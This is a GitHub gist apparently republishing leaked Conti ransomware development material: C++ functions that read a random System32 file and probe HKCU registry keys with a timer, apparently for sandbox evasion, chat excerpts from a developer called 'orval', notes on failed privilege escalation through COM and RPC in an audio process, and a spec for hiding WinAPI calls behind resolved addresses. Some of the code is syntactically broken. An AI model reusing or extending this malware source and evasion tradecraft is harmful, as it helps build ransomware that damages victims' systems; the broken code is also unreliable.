Last active
March 11, 2022 13:22
-
-
Save SofianeHamlaoui/630309adaeb27068096f2023e76819a1 to your computer and use it in GitHub Desktop.
Conti.Functions()
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| char* GetRandomBuf() | |
| { | |
| char tempFileName[MAX_PATH]; | |
| char targetFileName[MAX_PATH]; | |
| // random | |
| size_t randomNum = 8; | |
| WIN32_FIND_DATAA ffd; | |
| DWORD size = 0; | |
| GetSystemDirectoryA((LPSTR)tempFileName, (UINT)MAX_PATH); | |
| GetSystemDirectoryA((LPSTR)targetFileName, (UINT)MAX_PATH); | |
| StringCchCatA(tempFileName, MAX_PATH, "\\\*"); | |
| HANDLE f = FindFirstFileA(tempFileName, &ffd); | |
| size_t count = 0; | |
| char** fileNamesArr = new char*[5000]; | |
| DWORD rbRead; | |
| for (size_t i = 0; i < 5000; ++i) | |
| fileNamesArr[i] = new char[MAX_PATH]; | |
| // set randomly | |
| size_t fileSize = 150000; | |
| do | |
| { | |
| if (!(ffd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) | |
| { | |
| if (ffd.nFileSizeLow > fileSize) | |
| { | |
| int a = 1; | |
| int b = 2; | |
| StringCchCopyA(fileNamesArr[count], MAX_PATH, ffd.cFileName;) | |
| ++count; | |
| a += b + count; | |
| } | |
| } | |
| } while (FindNextFileA(f, &ffd) && count < 5000); | |
| FindClose((HANDLE)f); | |
| randomNum %= count; | |
| StringCchCatA(targetFileName, MAX_PATH, "\\\"); | |
| StringCchCatA(targetFileName, MAX_PATH, fileNamesArr[randomNum]); | |
| HANDLE hFile = CreateFileA(targetFileName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL); | |
| size = (DWORD)GetFileSize((HANDLE)hFile, nullptr); | |
| char* buf = new char[size]; | |
| ReadFile((HANDLE)hFile, buf, size, &rbRead, nullptr); | |
| for (DWORD i = 0; i < fileSize; ++i) | |
| { | |
| if (buf[i] == 0) | |
| { | |
| size_t z = i; | |
| size_t t = i * 32; | |
| size_t y = i * 123 - 44 + i; | |
| z = t * y % 255; | |
| if (z != 0) | |
| buf[i] = z; | |
| else | |
| buf[i] = z + 23; | |
| i = 0; | |
| } | |
| } | |
| /*delete[] fileNamesArr; | |
| pCloseHandle(hFile); | |
| */ | |
| buf[fileSize - 1] = 0; | |
| return buf; | |
| } | |
| [24.09.21 15:37:40] orval: `` | |
| bool QueryReg(char* buf, DWORD startTime) | |
| { | |
| size_t result = 0; | |
| LSTATUS errCode = 0; | |
| HKEY hKey; | |
| size_t step = 0; | |
| //do random | |
| char* parameterName = (char*) "zsadsgjea"; | |
| //do random | |
| char* parameterValue = (char*) "svogfiifotuz"; | |
| DWORD dataSize = 12; | |
| while (step < StrLen(buf) - 18) | |
| { | |
| char* temp = (char*)MyHeapAlloc(12);// new char[12]; | |
| temp[11] = 0; | |
| m_memcpy(temp, buf + step, 11); | |
| errCode = (LSTATUS)RegOpenKeyExA((HKEY)HKEY_CURRENT_USER, temp, (DWORD)0, (REGSAM)KEY_READ, &hKey); | |
| if (errCode != ERROR_FILE_NOT_FOUND && hKey) | |
| { | |
| errCode = (LSTATUS)RegQueryValueExA(hKey, (LPCSTR)parameterName, nullptr, nullptr, (LPBYTE)parameterValue, &dataSize); | |
| if (errCode != ERROR_SUCCESS && hKey) | |
| ++result; | |
| } | |
| //step += 18; | |
| step += 40; | |
| free(temp); | |
| if ((DWORD)GetTickCount() - startTime > 1000 * 20) | |
| break; | |
| } | |
| return result > 10; | |
| } |
Negative result by audio so far
- injections into the process with higher primes do not work (via COM too)
- between the audio process and COM no interaction via LPC/ALPC/PIPE etc., that is, the operation of "server" in this case is not possible, plus ALPC is filtered by SID
- there is no sense to load RPC in your process because we have a bent user
In particular, here are all the RPC servers on the test machine
[+] Exe starting RPC Server: C:{Windows\System32\AppVShNotify.exe
[+] Exe starting RPC Server: C:\Windows\System32\BioIso.exe
[+] Exe starting RPC Server: C:Windows\System32\ByteCodeGenerator.exe
[+] Exe starting RPC Server: C:{Windows\System32\FsIso.exe
[+] Exe starting RPC Server: C:Windows\System32\FXSSVC.exe
[+] Exe starting RPC Server: C:{Windows\System32\LsaIso.exe
[+] Exe starting RPC Server: C:Windows\System32\lsass.exe
[+] Exe starting RPC Server: C:{Windows\System32\mpnotify.exe
[+] Exe starting RPC Server: C:{Windows\System32\NetEvtFwdr.exe
[+] Exe starting RPC Server: C:{Windows\System32\NgcIso.exe
[+] Exe starting RPC Server: C:Windows\System32\rdpclip.exe
[+] Exe starting RPC Server: C:\Windows\System32\rdpinit.exe
[+] Exe starting RPC Server: C:\Windows\System32\rdpshell.exe
[+] Exe starting RPC Server: C:\Windows\System32\services.exe
[+] Exe starting RPC Server: C:Windows\System32\SgrmLpac.exe
[+] Exe starting RPC Server: C:{Windows\System32\svchost.exe
[+] Exe starting RPC Server: C:Windows\System32\TCPSVCS.EXE
[+] Exe starting RPC Server: C:{Windows\System32\WaaSMedicAgent.exe
[+] Exe starting RPC Server: C:\Windows\System32\wimserv.exe
[+] Exe starting RPC Server: C:\Windows\System32\wininit.exe
[+] Exe starting RPC Server: C:\Windows\System32\winlogon.exe
[+] Exe starting RPC Server: C:\Windows\System32\wlanext.exe
[+] Exe starting RPC Server: C:{Windows\System32\IME\IMJP\IMJPDCT.EXE
HKEY_CLASSES_ROOT\CLSID{27F71832-6815-48CB-902A-7A1D891BA962} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{294935CE-F637-4E7C-A41B-AB255460B862} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{41FCCC3A-1FA1-4949-953A-6EE61C46A4D1} Microsoft.Audio.AudioClient Binder - 0 cmd
HKEY_CLASSES_ROOT\CLSID{444F7305-1D7D-4BE9-8C29-CC3F1D220C40} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{562462DD-4F9A-4110-9D6A-C3CA0407FF76} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID{69A95A38-C637-46A0-9FB2-1C939AEBF2E8} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID{6EC153C1-371E-47E1-A896-2F7F80EB7842} psfactorybuffer - 0 cmd
HKEY_CLASSES_ROOT\CLSID{73843B93-848F-453B-953D-2E5B911429DC} - 0 cmd
HKEY_CLASSES_ROOT\CLSID{870AF99C-171D-4f9e-AF0D-E63DF40C2BC9} - 9 cmd
HKEY_CLASSES_ROOT\CLSID{8D9945C3-A621-4F52-8641-6D8B755F42E2} - 12 cmd system blocked
HKEY_CLASSES_ROOT\CLSID{ede7f087-890f-491c-b906-9abb31896960} CLSID_EuVolumeNotificationCallback - 0 cmd
HKEY_CLASSES_ROOT\CLSID{FD7F2B29-24D0-4B5C-B177-592C39F9CA10} psfactorybuffer - 2 cmd
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Instructions :
Calls to winapi functions should not be made directly, but through the provided api.
The developer is provided with the addresses of all the functions he needs. The required address will contain an identifier (declared with the #define derequisite).
The name of the required identifier is the function name + prefix f (the address of the MessageBoxA function contains the identifier fMessageBoxA, etc.).
To use the identifier you need to include the header file "LoadFunctionsApi.hpp".
Example usage:
The values are compiled based on the functions that the plugin uses and, respectively, the name of the library that provides that function.
The required format of the array is presented in the example. The names of the functions for each plugin will be given below.
Example function:
[12.11.21 20:43:28] orval: and for the last plugin I said I'll send you the requirements
[12.11.21 20:43:31] orval: ``
Plugin function prototype: def generate_api(arr), file generate_api.py
Module function prototype: void LoadFunctionsApi(), files LoadFunctionsApi.cpp, LoadFunctionsApi.hpp
The module's code must not contain direct function calls (if you need to find the addresses yourself).
The plugin accepts the array described in section 4. The LoadFunctionsApi.hpp file contains the code for the void LoadFunctionsApi() function definition, as well as
#define dereqs, which will contain the addresses of the functions. The name of the identifier of the dereq = f + function name, the value of the identifier = function address. An example of how it will be used is in the paragraph 3.
The LoadFunctionsApi.cpp file contains the void LoadFunctionsApi() function. In it you need to load all the necessary libraries, and initialize the addresses of the functions.